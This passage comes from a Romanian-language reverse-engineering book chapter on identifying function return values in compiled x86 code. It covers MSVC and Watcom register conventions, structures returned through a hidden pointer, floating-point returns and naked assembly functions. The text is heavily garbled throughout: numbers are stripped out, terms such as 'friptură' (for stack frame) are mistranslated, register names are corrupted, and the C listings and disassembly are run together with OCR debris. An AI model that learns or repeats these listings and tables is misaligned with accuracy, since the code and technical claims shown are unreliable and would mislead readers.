printr -un argument implicit la Partea a III -a Identificarea structurilor cheie ale limbilor de nivel ridicat Tabelul Mecanismul de returnare avalorii operatorului de retur în compilatoare pe de biți Tip Tip Tip retur AL AH EAH AH AH EAX EAX EAX EDX EDX:EAC EAC EAX EDX EDX: EAC lângă Pointer EAH, luați în considerare un exemplu Demonstrarea mecanismului pentru revenireaprincipalelor tipuri de valori (lista ) #include #include char func (char a, char b) (returna+b; int inte func (int a, intete b) {return a+b;} int func ( nt func, int b) (return a + b; int* ner func(int* a, int* b) (int* c; c = (int*) malloc (sizeof (int)); c [ ] = a [ ] + b [ ]; return c; main () (a = x ; b = x ; printf ("%x \ n", char func ( x , x )+ int func ( x , x )+ int func ( x , x )+ aproape func) (& A, & b) [ ]);cpava Identificarea valorii returnate de funcția Rezultatul compilării sale folosind Microsoft Visual C ++ cu setările implicite va arăta așa cum se arată în lista I Listarea f * Mtawwwft vte "alc*+ l d '"-?': 'Char funcproc apropiat; cod xref: main+ la> lp arg = byte ptr arg = byte ptr och push ebp ebp ebp, esp; deschideți stivafriptură; MOVSX EAX, [EBP+ arg ]; Descărcați tipul de char semnat în EAX arg , extinderea simultan la int MOVSX ECX,[EBP+ arg ]; încărcați -l în mașina semnată de tip EAX Arg Ryia it înainte de int Adăugați eax, ECX;Pliați arg șiarg , extins la intete, păstrarea lor în registru;EAX - Acesta este sensul returnat de funcție Din păcate, de încredere;Este imposibil să sestabilească tipul său El poate reprezenta un succes egal;Sinele și int și mașina, în plus, Int este și mai probabil,deoarece cantitatea de două;Char din motive de securitate ar trebui să fie plasat în INT ,;În caz contrar, revărsareaeste posibilă Ror retn char func int func ebp endp proc din apropiere;Cod xref: main + > lp arg = dword ptr arg = dword ptr och push ebp ebp ebp, esp;Deschide rama Stack MOV EAX, [EBP+arg ];Încărcăm arg de tipul int Adăugați eax,[ebp+arg ];Pliați arg c arg și lăsați rezultatul în registrul EAH ;Aceasta este valoarea returnată de funcție, celmai probabil, cum ar fi Int Pop ebp retn int func endp int func proc aproape C DE XREF: Main + > LP Arg = DWORDPTR PARTEA III Identificarea structurilor cheie ale limbilor de nivel înalt arg = DWORD PTR OCH arg = DWORDPTR LOH arg c = DWORD PTR H PUSH EBP EBP EBP, ESP;Deschide rama Stack MOV EAX, [EBP+arg ];Încărcăm valoareaargumentului Arg în EAX Adăugați eax, [ebp+arg ];Foliere arg C arg Mov edx, [ebp+arg ];Încărcăm valoareaargumentului Arg în EDX ADC EDX, [EBP+arg c];Pliați arg și arg c ținând cont de steagul transferului rămas dinadăugare;Arg cu arg ;Se dovedește că arg și arg , cum ar fi arg și arg c sunt jumătate din două;Argumenteprecum int , pliate între ele ;Prin urmare, rezultatul calculelor este returnat la marginile EDX: EAX Pop ebp retnint func endp aproape func proc aproape Cod xref: main+ j, p var = dword ptr - arg = dword ptr arg = dwordptr och push ebp ebp ebp, esp;Deschide rama Stack Împinge ECX;Salvăm ECX PUSH ;Size t apelează malloc add esp, ;Subliniem octeți dintr -o grămadă MOV [EBP+VAR ], EAX;Aducem indicatorul în memoria selectată în variabilăѵAG MOV EAX, [EBP+arg ];Încărcăm valoarea argumentului argument în EAX Mov ech, [eah];Încărcăm în ECH valoareacelulei de memorie -tip, pe care;Indică EAX Astfel, tipul de argument arg - int * mov edx, [ebp+arg ] gpav identificarea valorii returnate de funcția ;Încărcăm valoarea argumentului Arg în EDX Adăugați esh, [edx];Pliați cu*arg o valoarea tipului de tip int, pe care;Indică EDX Prin urmare, tipul de argument este arg - int * MOV EAX,[EBP+VAR ];Încărcăm indicatorul în EAX la blocul de memorie alocat din grămadă mov [eah], esh;Copiați suma sumei *arg și *arg într -o grămadă MOV EAX, [EBP+VAR ];Încărcăm indicatorul în EAX la blocul de memorie alocat dingrămadă ;Acesta va fi sensul returnat funcției, adică prototipul său!Arăta așa: int *myfunk (int *a, int *b);MOV ESP,EBP POP EBP RETN NEOR FUNK ENDP PROC PROCET C de xref: start+af^p var = dword ptr - var = dword ptr - push ebp movebp, esp;Deschide rama Stack Sub esp, ;Rezervăm un loc pentru variabile locale Push ESI Push edi;Salvăm registrele înstivă MOV [EBP+VAR ], H;Intrăm în variabila locală ѵAG TIP INT OKHBBB MOV [EBP+VAR ], H;Intrăm valoarea x în variabila locală ѵAG Push Push Call Char func Adăugare esp, ;Apelați funcția char func ( ) După cum neamintim, am avut îndoieli;Tipul de valoare returnat de acesta este fie Int sau Char Movsx ESI, AL;Extindem valoareareturnată la Int -ul semnat, prin urmare ,;Ea a revenit semnată Char PUSH PUSH CALL INT FUNC PARTEAIII Identificarea structurilor cheie ale limbilor de nivel ridicat adaugă ESP, ;Apelați funcția int func ( , ), carereturnează valoarea tipului int Adăugați eah, ESI;Adăugăm la valoarea funcției de retur, conținutul ESI CDQ;Conversăm uncuvânt dublu conținut în registrul EAX, în cvadruplu ,;plasat în registrul EDX: EAX MOV ESI, EAX MOV EDI, EDX;Copiațicuvântul cvadruplu extins în registrele ESI: ESI Push About Push Push About Push Call Int func Adăugare esp,loh;Apelați funcția INT FUNC ( # ), care returnează tipul int Acum;Devine clar ce a provocat extinderearezultatului anterior Adăugați ESI, EAH ADC EDI, EDX;La cuvântul cvadruplu conținut în registrele EDI: ESI,Adăugare;Rezultatul returnat de funcția INT FUNC Lea eah, [ebp+var ];Încărcăm în EAX un pointer la o variabilăѵag PUSH EAH;Transmitem funcțiile indicatorului apropiat func la ѵAG ca argument Lea esh, [ebp+var ];Încărcămindicatorul la variabila ѵAG Push Ech;Transmitem funcțiile indicatorului apropiat func la ѵAG ca argument Apelațiaproape func adăugați esp, ;Sunați aproape func mov eax, [eax];După cum ne amintim, în registrul EAH, funcția areturnat indicatorul;Tip variabil Int - Încărcare valoarea acestei variabile;la Registrul EAX CDQ;Extindem EAX la cuvântul cvadruplu Adăugați ESI, EAH ADC EDI,EDX;Îndoiți două cuvinte cvadruple PUSH EDI CPAVA Identificarea valorii returnate de funcția Push ESI;Rezultatuladăugării transmiterii funcției printf Push Offset UK ;Transmitem indicatorul către linia specificilor Sunați la printf add esp, och pop edi pop esi mov esp, ebp pop ebp retn endp principal După cum puteți vedea, nu este nimicviclean pentru a identifica valoarea returnată de operatorul de retur Dar nu ne vom grăbi Luați în considerare următorulexemplu (listarea ) Ce crezi și în ce registre se vor întoarce?#include #include struct XTmyfunc (char 'a, int b) // funcția returnează tipul de structură „ht” prin sens {struct ht xt;strcpy (& xt Deci [ ],a);xt x = b;Return xt;Main () (struct xt xt; xt = myfunc ("hello, marinar ", x ); printf (" %s %x \ n", & xt so [ ],xt x); hai să ne uităm la compilat Rezultat dat în lista = Listarea Rezultatul compilării exemplului dat înlista de myfunc proc apropiat; cod xref: sub + ip var = dword ptr - var = DWORD PTR Partea III Identificare Dintre structurile cheie ale nivelurilor înalte; variabilele sunt de faptelemente de „împărțire”; structura Ct Așa cum am menționat deja în capitolul , „Identificarea obiectelor; la adreselelor reale, și nu prin indicatorul de bază Nu este atât de ușor să distingem structura de neconectate; variabile și,uneori, este imposibil deloc! Arg = DWORD PTR arg = DWORD PTR OCH; funcția acceptă două argumente PUSHH EBP MOVEBP, ESP; Deschideți cadrul Sub ESP Sube esp, ; rezervați un loc pentru localvariabile MOV EAX, [EBP+arg ];Încărcămconținutul argumentului argumentului în registrul EAC PUSH EAH;Transmitem funcții arg ale Strcpy, prin urmare ,;Arg este un indicator la un șir Lea esh, [ebp+var ];Încărcăm indicatorul la variabila locală ѵAG și împingem Ech / Evaluează funcțiile Strcpy ;În consecință, ѵag - o dimensiune tampon de șir de octeți Apelați Strcpy Adăugare ESP, ;Copiați linia transferată prin arg la ѵag Mov edx, [ebp+arg ];Încărcăm valoarea argumentului Arg în registrulEDX MOV [EBP+VAR ], EDX;Copiați arg în variabila locală VAR MOV EAX, [EBP+VAR ];Încărcăm conținutul (nu este unindicator!) Tampon Strokal în EAX Mov edx, [ebp+var ];Încărcăm valoarea variabilă ѵAG în EDX Atât de evidentîncărcare;EDX: EAX registre înainte de a părăsi funcția indică;Faptul că aceasta este o valoare returnată de ofuncție ;Uau, ce surpriză neașteptată funcția revine la EDX și EAX;Două variabile de diferite tipuri!Dar deloc int , așa cum ar putea;Să apară cu o analiză blestemată a programului ;A doua surpriză este o întoarcere a tipuluide tip [ ] nu prin pointer sau legătură, ci;Prin registru!;Am fost încă norocoși, pentru că dacă structura ar fideclarat ca;Struct xt {scurt int, char b, char c), gPAV ar reveni la registrul EAX Identificarea valorii returnatefuncției ;Până la trei variabile de două tipuri!Mov ESP, ebp pop ebp retn myfunk endp principal proc C de xref:start+af^p var = dword ptr - var = dword ptr - ;Două variabile locale precum Int ;Tipul este stabilit calculânddimensiunea fiecăruia dintre ele Push EBP MOV EBP, ESP;Deschide rama Stack Sub esp, ;Rezervăm opt octeți pentruvariabile locale Împinge h;Transmitem funcțiile de tip MyFunk Int Prin urmare, ;Arg are un tip de int (acesta nu afost codul funcției cauzate; evident, - arg ar fi putut fi un indicator fără mai puțin succes) ;Aceasta înseamnă că înregistrul EDX, funcția returnează tipul ± nt Push ofset ahellosailor;„Bună ziua, marinar”;Trimiteți funcțiile MyFUHCindicatorul la linie ;Atenţie!Linia necesită mai mult de octeți, de aceea nu este recomandat;Rulați acest exemplu„live” Sunați myfunk add esp, ;Sunați Myfunk Într -un fel, schimbă registrele EDX și EAX ;Știm deja tipurile de valorireturnate în ele și rămâne doar;Pentru a vă asigura - „corect”, indiferent dacă sunt utilizate de o funcțiesfidătoare MOV [EBP+VAR ], EAH;Adăugăm conținutul registrului EAX în variabila locală mov [ebp b ouch ],edx;Introducem conținutul registrului EDX în variabila locală ;De acord, este foarte similar cu faptul că funcțiareturnează int MOV EAX, [EBP+VAR ];Încărcăm conținutul din EAH ѵAG ;(adică, registrul EDX, returnat de funcțiamyfunk) și push eax;Trimiteți funcțiile sale printf ;Conform liniei de specificatori, acesta este tipul de int ;Prinurmare, în EDX funcția a returnat int sau cel puțin ea;Mai mare Lea Esh, [EBP+VAR ] ;Încărcăm indicatorul la variabila ѵAG , care stochează valoarea, Partea III Identificarea structurilor cheie alelimbilor de nivel ridicat;Returnat de o funcție prin registrul EAX ;Conform liniei specificelor, acesta este unindicator al liniei ;Deci, am confirmat că tipurile de valori returnate prin registre;EDX: EAX sunt diferite ;După ce ne-am gândit puțin, putem chiar restabili un prototip autentic :;Struct x {char a [ j;int) myfunk (char* b, int c);PushECX Push Offset ASX;" %S %x \ n" CALL PRINTF ADD ESP, OCH MOV ESP, EBP POP EBP;Închideți rama lui Stack Retn Main Endpși acum vom schimba ușor structura HT, înlocuind Char astfel [ ] cu Char SO [ ], care este garantat să nu se încadrezeîn registrele EDX: EAH și să vedem cum se va schimba codul din acest lucru ( Listarea ) ;Cod xref: start+af^p var = byte ptr - oh var -dword ptr -loh var c = dword ptr -och var = dword ptr - var = dword ptr - push ebp movebp, esp;Deschide rama Stack Sub esp, oh;Rezervăm x octeți pentru variabile locale Împinge h;Transmitem funcțiileMyFunk argumentul extremă drept -;Valoarea x tip int Push ofset ahellosailor;„Bună ziua, Sailor ”;Transmitemfuncțiile MyFunt cel de -al doilea argument spre dreapta - un indicator la linie Lea eah, [EBP+VAR ];Încărcăm adresavariabilei locale din EAH PUSH EAH;Transmitem funcțiile MyFunk către variabila ѵAG Stop!;Acest argument nu a fost înprototipul funcției!De unde a venit?!;Adevărat, nu a existat A fost introdus de către compilator pentru a returnastructura software -ului;sens Ultima frază merită de fapt în ghilimele pentru;oferindu -i o nuanță ironică - o structurăreturnată de valoare, GPAVA Identificarea valorii returnate de funcție ;De fapt, seîntoarce prin link Sunați myfunk add esp, och;Sunați Myfunk Mov ecx, [eax];Funcția din ECX a returnat indicatorul lalinkul returnat la ea;structura Această tehnică este caracteristică numai pentru Microsoft Visual C ++;Iar majoritateacompilatorilor lasă valoarea EACS la ieșire;Incert sau egal cu zero Dar, într -un fel sau altul, se încarcă înESH;Primul cuvânt dublu indicat de indicatorul EAX Pentru primul ;O privire, acesta este un int Cu toate acestea, nu nevom grăbi cu concluzii mov [ebp+var ], esh;Conservarea ECH în variabila locală ѵAG Mov edx, [eax+ ];În EDX,încărcăm cel de -al doilea cuvânt dublu în funcție de indicatorul EDX mov [ebp+var c], edx;Copiați -l într -o variabilăѵag s ;Se dovedește că al doilea element al structurii are tipul de int?;Noi, știind cum arăta textul original alprogramului, va începe deja;Observați captura Ceva aici nu este cu siguranță așa Mov esh, [eax+ ];Încărcăm altreilea cuvânt dublu, din indicatorul EAX și mov [ebp+var ], esh; Faceți -l în ѵag Un alt tip de int?De unde provinîn asta;Cantitate când am avut doar una!Și unde, de fapt, o linie?Mov edx, [eax+och] mov [ebp+var ], edx;Iar un alt tipde int este transferat de la structură la variabilă locală Nu, ;Acest lucru este deasupra forțelor noastre!MOV EAX,[EBP+VAR ];Încărcăm conținutul variabilei ѵAG în EAC PUSH EAH;Transmitem valoarea ѵAG Funcții printf ;Judecând dupălinia specificilor, ѵAG are într -adevăr tipul de int Lea esh, [ebp+var ];Obținem un pointer la variabila ѵAG șiîmpingem ech / urmați funcția sa printf;Judecând după linia specificatorilor, tipul de echitație - char *, prinurmare: ѵag ;Și există o linie dorită Intuition ne spune că ѵag s și ѵag ,;Situat sub acesta (adică, în adrese maivechi), acestea conțin și;linia Doar un compilator în loc să apeleze la srtcpy a decis asta;Va fi mai rapid să -lcopiezi de unul singur, ceea ce ne -a introdus;eroare Prin urmare, nu ar trebui să vă grăbiți niciodată cu identificareaa partea a III -a Identificarea structurilor cheie ale limbilor de nivel ridicat;Tipuri de elemente alestructurilor!Verificați bine fiecare octet - vă place;Este inițializat și cum este utilizat Operațiuni de transmisiecătre local;Variabilele nu s -au spus despre nimic încă Push Offset ASX;" %S %x \ n" CALL PNNTF ADD ESP, OCH MOV ESP,EBP POP EBP;Închideți rama lui Stack Retn principal endp myfunk proc C DE XREF: Main+ Speed ​​Var = DWORD PTR -LOHVAR C = DWORD PTR -CH VAR = DWORD PTR - VAR = DWORD PTR - Arg = DWORD PTR arg = DWORD PTR OCH arg = DWORDPTR LOH;Vă rugăm să rețineți că funcțiile sunt transmise de trei argumente, și nu de două, cum;A fost anunțat înprototip Push EBP MOV EBP, ESP;Deschide rama Stack Sub esp, loh;Rezervăm memorie pentru variabile locale MOV EAX,[EBP+arg ];Încărcăm și EAX un indicator pe al doilea argument potrivit PUSH EAH;Trimiteți indicatorul la funcțiilearg strcpy Lea esh, [ebp+var ];Încărcăm indicatorul la variabila locală ѵAG Push Ech;Transmitem funcțiile Strcpyindicatorul către variabila locală ѵAG Apelați Strcpy Adăugare ESP, ;Copiați linia transportată funcțiile MyFunk prin argumentul arg Mov edx, [ebp+arg ];Încărcăm valoareaargumentului potrivit la EDX transmis de MyFunk MOV [EBP+VAR ], EDX;Copiați arg în variabila locală ѵAG GPAVA Identificarea valorii returnate de funcția MOV EAX, [EBP+arg ];Încărcăm valoarea argumentului argument în EAX Dupăcum știm, acesta;Argumentul funcției este transmite compilatorul în sine și transferă indicatorul în el;Pe o variabilălocală concepută pentru a returna structura Mov ech, [ebp+var ];Descărcăm un cuvânt dublu cu o variabilă localăѵag Ca noi ;Ne amintim că în variabila locală ѵAG o linie a fost copiată anterior;Prin urmare, acum o vom vedeadin nou copierea ei „două -cuvânt”!Mov [eah], esh mov edx, [ebp+var c] mov [eax+ ], edx mov ecx, [ebp+var ] mov[eAx+ ], ecx;Și sigur!De la variabila locală ѵAG la variabila locală *arg ;Copierea are loc „manual” și nu foloseșteStrcpy!;În total, acum octeți au fost copiați, ceea ce înseamnă primul;Structura structurii arată astfel: char z[ ] ;Da, desigur, în testul inițial a existat „Char So [ ]”, dar compilatorul;alinierea elementelor structurale laadresele multiplelor patru, transferate;Al doilea element este int x, la adresa+ xl , creând astfel o „gaură”;Întresfârșitul liniei și începutul celui de -al doilea element ;Analiza listei DizAssemblery nu permite restabilireaadevăratei;Tipul de structură, singurul lucru care se poate spune este lungimea liniei SO;Se află în interval [ - ] Mov edx, [ebp+var ] mov [eax+och], edx;Copiați variabila var (care conține argument arg ) în [eax+os] ;Într-adevăr, cel de -al doilea element al structurii -int X- este localizat în funcție de deplasare; octeți de laînceputul său MOV EAX, [EBP+arg ];Reveniți la EAX al indicatorului la argumentul argument care conține indicatorul depe;Structura returnată Mov ESP, EBP POP EBP;Închideți rama lui Stack Retn;Deci, prototipul funcției arată astfel:;Struct x {char s [ ], int a} myfunc (struct x *x, char *y, int z) myfunc endp Se ridică întrebarea - Cum suntstructurile constând din sute și mii de octeți?Răspuns: Sunt copiate într -o variabilă locală, transferată implicit decătre compilator de către link, instrucțiunile MOVS, pe care le vom asigura acum schimbând Char S în textul original alexemplului precedent [ ] în Char So [OKHBBB ] Rezultatul compilării încrucișate ar trebui să arate așa cum se arată înlista Partea III Identificarea structurilor cheie ale limbilor de nivel înalt Var c = byte ptr - ch var =dword ptr - arg = dword ptr arg = dword ptr och arg = dword ptr loh ebp mov ebp, esp;Deschide rama Stack Subesp, ch;Rezervăm memorie pentru variabile locale Push ESI Push edi;Salvăm registrele în stivă MOV EAX, [EBP+Arg ]Push Eax Ech, [EBP+VAR C] PUSH ECX CALL STRCPY ADD ESP, ;Copiați funcțiile liniei în variabila locală VAR C Movedx, [ebp+arg ] mov [ebp+var ], edx;Copiați argumentul arg în variabila locală var Mov Ecx, bh;Intrăm valoarea x V în ECX, deși nu înțelegem încă ce exprimă Lea ESI, [EBP+VAR C];Instalăm registrul ESI pe o variabilă localăѵAG S mov edi, [ebp+arg ];Instalăm registrul EDI la variabila indică;Pointerul transmis în argumentul arg RepeMOVSD;Copiați echivalentul cuvintelor duble de la ESI în EDI ;Transformându -l în octeți, obținem: x v* =okbbs ;Astfel, atât linia ѵAG S este copiată, cât și variabila ѵAG MOV EAX, [EBP+arg ];Revenim la EAX un indicatorcătre o structură returnată Pop edi Pop ESI Mov Esp, EBP GPAV Identificarea valorii returnate de funcția POP EBP ;Închidem cadrul stivei, retn myfunk endp ar trebui să țină cont de faptul că mulți compilatori (de exemplu, watcom)transmit indicatorul către tampon pentru valoarea de retur nu prin stivă, ci prin registru, iar registrul nu este deobicei luat de la coada candidaților în ordinea preferințelor (a se vedea tabelul din capitolul ) În schimb, esteutilizat un registru special conceput special în acest scop De exemplu, WATCOM este un registru ESI Întoarcereavalorilor materiale ale Acordului CDECL și STDCALL prescrie returnarea valorilor materiale (plutitor, dublu, dublu lung)prin paharul consultantului, valorile registrelor EAX și EDX și EDX la Ieșirea unei astfel de funcții poate fi oricare(cu alte cuvinte, funcțiile care returnează valorile materiale lasă registrele EAC și EDX într -o starenedeterminată) Funcțiile FastCall pot returna teoretic variabile materiale în registre, dar în practică nu ajunge deobicei, deoarece însoțirea nu poate citi direct registrele procesorului principal și trebuie să fie împinse prin RAM,care anulează toate avantajele unui rapid apel Pentru a confirma ce s -a spus, examinăm exemplul dat în listă ^Spzhgzo & prof^iiadi ^^ '' ♦ include float myfunk (float a, float b) {return a+b;Main () printf ("%f \n", myfunc ( ));Rezultatul compilării sale folosind Microsoft Visual C ++ ar trebui să arate aproximativ așa cumse arată în lista Principalul proc aproape;Cod xref: start+af> lp var = qword ptr - push ebp ebp ebp,esp;Deschide rama Stack PUSH F A D H PUSH D EB H;Transmitem funcțiile argumentelor MyFunk Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat;Până acum, încă nu putem instala tipullor Sunați myfunk fstp [esp+ +var ];Strângem valoarea materială adusă acolo;Funcție myfunk ;Pentru a determina tipulsău, ne uităm la opcodul instrucțiunilor, - DD C ;Conform tabelului Stabilim - aparține dublului ;Așteptați,așteptați, cum este dublu, deoarece funcția ar trebui să returneze Float !;Deci este așa, dar aici există o transformareimplicită a tipurilor;Când transmiteți un argument al funcției printf care așteaptă dublu ;Acordați atenție locului încare funcția returnată este strânsă;Valoare: [ESP+ - ] == [ESP], adică este plasată în partea de sus a stivei ,;Ce esteechivalent cu împingerea cu comenzile push Push Offset AF;"%f \ n";Transmitem funcțiile printf indicatorul către liniaspecificatorilor „%f \ n” Call -Printf Adăugare ESP, OCH POP EBP Retn Main Endp MyFunk Proc C de xref: main+dîp arg =dword ptr arg = dword ptr och push ebp mov ebp, esp;Deschide rama Stack FLD [EBP+arg ];Strângem în partea de sus afripturii argumentului de însoțire arg ;Pentru a determina tipul său, ne uităm la instrucțiunile OPCOD FLD - D ;Dacă da, acesta este float Fadd [ebp+arg ];Fold arg , tocmai tras în partea de sus a fripturii însoțirii ,;cuarg , plasând rezultatul în aceeași stivă și pop ebp retn; Ne întoarcem din funcție, lăsând rezultatul adăugării adouă plute;În vârful fripturii însoțirii ;Este amuzant dacă declarați o funcție ca dublă, acest lucru va oferi unui codidentic MyFunk Endp o observație despre mecanismul de returnare a valorilor din compilatorul WATCOM cu compilatorul WWATCOM C oferă programatorului posibilitatea de a alege „manual” în care înregistrează (registrele) funcția va returnarezultatul activității sale Acest lucru este foarte complicat de analiză, deoarece, așa cum am menționat deja anterior,conform acordurilor general acceptate, funcția nu ar trebui să strice EBX, ESI și EDI (VX, SI și DI în codul de biți), văzând opera GPAVA Identificarea valorii returnate de funcția citind registrul ESI, care merge dupăapelarea funcției, în primul rând, vom decide că aceasta a fost inițializată chiar înainte de a fi numită - deoareceacest lucru se întâmplă în marea majoritate a cazurilor, dar Nu cu WATCOM, care poate forța funcția să returnezevaloarea în orice registru general, cu excepția HEB (BP), forțând cercetătorul să studieze atât funcțiile cauzate, câtși cele cauzate Registrele admise pentru a returna funcția funcției în compilarea WATCOM cu sunt enumerate în tabelul Bulge în registrele implicite sunt alocate Vă rugăm să rețineți că tipul de valoare returnat este imposibil de aflatdirect direct și doar dimensiunea acesteia, în special, prin registrul EAC, atât o variabilă INT, cât și o structură depatru variabile, cum ar fi Char (sau două Char sau un scurt Int) se poate întoarce Tabelul Registrele admise pentrureturnarea funcției funcției în WATCOM compilează cu tipul admisibil unu -timp a > bl cl dl bh dh two -byte ax cx bx dxsi di ebx ebx edx edx esi edi ecx: ebx ecx: ex ecx: exii : ESI: ESI: ESI: ESI: ESI EDX: EBX EBX: EAX EDI: EAX ECX: EDIEDX: ESI EDI: EBX ESI: EAX ECX: EDX EDX: EDI EDI: ESI ESI EBX EBX EBX ECX EDX EDX EDX EDX EDX EDX EDX EDX: EAX CX: EBXCX: EBX CX: EBX CX: EBX CX: EBX CX EAX CX: ESI DX: EBX DI: EAX CX: EDI DX: ESI DI: EBX SI: EAX CX: EDX DX: EDI Di: ESISI: EBX BX: EAX FS: ECX FS: EDX FS: EDI FS: ESI FS: ESI FS: EBX FS: EAX GS: ECX GS: EDX GS: EDI GS: ESI GS: EBX GS: EAXDS: ECX DS: EDX DS: EDI DS: ESI DS: EBX DS: EAXES: ECX ES: EDX ES: EDI: EDI: EDX: EDI ES: ESI ES: EBX ES: EAX FLOAT ???????????????Double EDX: EAX ECX: EBX ECX: EAX ECX: ESI EDX: EBX EDI: EAX ECX: EDI EDX: ESI EDI: EBX ESI: EAXECX: EDX EDX: EDI EDI: ESI ESI: EBX EBX: EAX Show How It It arată în practică Luați în considerare un exemplu dat înlista ( ,, L ^> ^ Circ, ■ -fa ■ v #include int myfunc (inta, int b) {#pragma aux myfunc valoarea [esi] // pragma aux cuplat cu Cuvântul cheie „valoare” permite // Setarea manuală a registrului, // prin care va fi returnat rezultatul calculelor Partea III Identificarea structurilor cheie ale limbilor de nivel înalt // În acest caz, este prescrisăsă se întoarcă prin ESI Returnează A+B;} Main () {printf ("%x \ n", myfunk ( x x ));} Rezultatul compilăriiacestui exemplu ar trebui să privească aproximativ așa cum se arată în lista ;Listarea Rezultatul compilăriiexemplului prezentat prin listarea -, = main proc aproape Cod xref: SMAIP+ IR PUSH H CALL CHK;Verificareastivei pentru revărsare Push Edx Push ESI;Salvăm ESI și EDX Acest lucru sugerează că acest compilator;Respectă Acordulde conservare ESI ;Comenzile de conservare EDI nu sunt vizibile, ci acest registru;Nu este modificat de această funcțieși, prin urmare, nu este nevoie să o păstrați Mov edx, h mov eax, h;Transmitem funcțiile MyFunk două argumente aleINT Sună Myfunk;Sunați Myfunk Conform acordurilor general acceptate, EAX, EDX și UE;La ieșirea din funcție, acesteaconțin fie nedeterminate ,;sau o valoare returnată de funcție ;Regiunile rămase în cazul general ar trebuisalvate Împinge ESI;Transmitem funcțiile ESI Register Printf Nu putem cu încredere;Spuneți dacă conține un sens returnatde o funcție sau a fost;Inițializat chiar înainte de a fi numit Push Offset ASC ;"%x \ n" apel printf adaugă esp, pop esi pop edx retn main endp myfunc proc aproape Cod xref: main + îp push apel chk cpava identificareavalorii returnate de funcție ;Verificarea stivei pentru revărsare Lea ESI, [EAX+EDX];Șiacum un truc viclean cu adăugarea necunoscută pentru noi La prima vedere, ;În ESI, indicatorul este încărcat peEAX+EVOS, - de fapt, este și;Se întâmplă, dar până la urmă, indicatorul de la EAX+ESH în același timp este ei;Suma,adică această echipă este echivalentă cu adăugarea EAH, EDX/Moosi, EAX ;Aceasta este valoarea returnată de funcție -deoarece ESI a fost;Modificat și nu este salvat!;Astfel, funcția de comandă Push ESI transmite printf;Rezultatuladăugării de x și x , care a fost necesară pentru a afla Retn myfunk endp returnarea valorilor de către funcțiide asamblare construite Creatorul funcției de asamblare este liber să returneze valorile în orice registre pe care le vafi pe placul Cu toate acestea, întrucât funcțiile sfidătoare ale unui limbaj cu nivel ridicat se așteaptă să vadărezultatul calculelor în registre strict definite, trebuie respectate acorduri standard Un alt lucru, funcțiile deasamblare „interne” - este posibil să nu respecte deloc reguli, ceea ce demonstrează următorul exemplu dat în lista Listarea L Un exemplu care demonstrează revenirea sensului prin „funcții” de asamblare încorporate/ ”>#include // Funcție goală care nu are un prototip-// Programatorul în sine ar trebui să aibă grijă detot! declspecf gol) int myfunk () ( asm {Lea ebp, [eax+ecx]; revenim la EBP cantitatea de EAX și ECX Registre;argumentele sunt transmise și prin care - rezultatul calculelor este returnat Ret principal () (int a = x ; int s = x ; int c; asm {push ebp push edi edi eAx, [a]; mov ecx, [b]; Partea III Identificarea structurilor cheieale nivelului înalt -nivel Limbi Lea edi, s // numim funcția MyFunc din funcția de asamblare, trecând -o la ea //argumente prin registrele pe care le „vrea”, numiți myfunk; // acceptăm valoarea returnată la Heb /Și Salvați -l învariabila locală MOV [EDI], EBP POP EDI POP EBP) printf ("%x \ n", c);) Compilați un exemplu dat în lista , artrebui să utilizeze compilatorul Microsoft Visual C ++ Alți compilatori nu vor putea compila acest exemplu, deoarece nuacceptă cuvântul cheie al Naked Rezultatul compilării ar trebui să arate așa cum se arată în lista : L este ^^ggkyasCod xref: main+ VLP LA EBP, [EAX+ECX];Acceptăm argumente prin registrele EAX și ECH, revenind prin registru;Hebseste suma lor Desigur, exemplul este oarecum îndepărtat, dar clar!Retn myfunk endp min minim aproape;Cod xref:start+afip var c = dword ptr -ch var = dword ptr - var = dword ptr - push ebp ebp ebp, esp;Deschide rama Stack Subesp, och;Rezervăm un loc pentru variabile locale Push EBX PUSH ESI PUSH EDI;Salvam registrele variabile MOV [EBP+VAR ], H MOV [EBP+VAR ], H;Inițializăm variabilele var și var Push EBP Push EDI Capitolul Identificarea valoriireturnate de funcție ;Salvăm registrele sau le transmitem funcțiile?Este imposibil derăspuns până acum;Categoric MOV EAX, [EBP+VAR ] MOV ECH, [EBP+VAR ];Încărcăm valoarea în EAX Variabilă ѵAG , iar în UE - ѵAG Lea edi, [ebp+var c];Încărcăm indicatorul la variabila EDI ѵAG S Sună Myfunk;Numimmyfunk - din analiza funcției sfidătoare, nu este foarte clar cum;Argumentele îi sunt transmise Poate prin stivă șipoate prin registre ;Doar cercetarea codului MyFunk ne permite să stabilim ceea ce este adevărat;Se dovedește ultimapresupunere mov [edi], ebp;Ce ar însemna asta?Analiza singurei funcții sfidătoare nu poate da;Un răspuns exhaustiv șinumai analiza apelului sugerează că;Prin Heb, ea returnează rezultatul calculelor Pop edi pop ebp;Restaurați registreleschimbate ;Acest lucru sugerează că mai presus de aceste registre au rămas cu adevărat;stivă și nu este transmisăfuncții ca argumente ale MOV EAX, [EBP+VAR C];Încărcăm conținutul variabilei ѵag s în EAC Push EAX Push Offset UK CALL PRINTF ADD ESP, ;Apelați printf Pop edi pop esi pop ebx;Restaurarea registrelor Mov ESP, EBP POP EBP;Închidețirama lui Stack Returnarea principală a valorilor retn prin argumente, transmise de legătura, identificarea valorilorreturnate prin argumentele transferate de legătură, este strâns legată de identificarea argumentelor în sine După ce amevidențiat indicatoarele dintre argumente, funcțiile transferate, le aducem pe lista candidaților pentru valorireturnate Această problemă a fost discutată în detaliu în capitolul , „Identificarea argumentelor funcțiilor” Partea a III -a Identificarea structurilor cheie ale limbilor de nivel înalt va căuta acum: Există indicatori pentruvariabilele nefertilizate -evident, sunt inițializate prin funcția foarte cauzată Cu toate acestea, nu ștergețiindicatoarele către variabilele inițializate (în special egale cu zero) - pot returna și valori Pentru a clarificasituația va permite analiza funcției cauzate - vom fi interesați de toate operațiunile de modificare a variabilelortransmise de legătura Doar nu confundați acest lucru cu modificarea variabilelor transmise de valoare Acesta din urmămor automat la momentul finalizării funcției (mai precis, curățarea argumentelor din stivă) De fapt, acestea suntfuncții variabile locale și pot fi schimbate fără durere după bunul plac Luați în considerare exemplul dat în lista = Listarea Un exemplu care demonstrează returnarea valorilor prin variabile, transmisă: ș prin legătură •'#include #include // Funcția de inversare a liniei SRC cu înregistrarea sa în linia dst Voidrevers (char *dst, cost char *src) {strcpyfdst, src); strrev (dst);) // Funcția de inversare a liniei S // (rezultatuleste înregistrat chiar în linia) Void invers (char *s) { strRev (s);) // Funcția returnează suma a două argumente Intsumfint a, int b) {// Putem modifica fără durere argumentele, // trecut de valoare, // tratarea lor ca variabile localeobișnuite a+= 